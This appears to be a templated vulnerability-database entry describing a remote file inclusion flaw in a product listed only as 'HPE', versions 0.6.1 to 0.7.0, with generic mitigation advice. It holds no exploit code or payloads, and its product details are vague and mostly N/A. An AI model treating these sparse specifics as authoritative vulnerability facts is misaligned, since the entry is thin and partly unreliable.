Vendor: HPE
By: the master
CVSS: 8.8 (HIGH)
Remote File Inclusion
CWE: 98
Product Name: HPE
Affected Version From: 0.6.1
Affected Version To: 0.7.0
Patch Exists: YES
Related CWE: N/A
CPE: a:hpe:hpe
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020
HPE v0.6.1 Remote File Inclusion Vulnerability
HPE versions 0.6.1, 0.6.5 and 0.7.0 are vulnerable to Remote File Inclusion (RFI) attacks. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The URL references a malicious file, which the application then includes. This can lead to arbitrary code execution on the server.
Mitigation:
To mitigate this vulnerability, the application should be configured to only include files from trusted sources. Additionally, input validation should be performed to ensure that the user-supplied data is valid.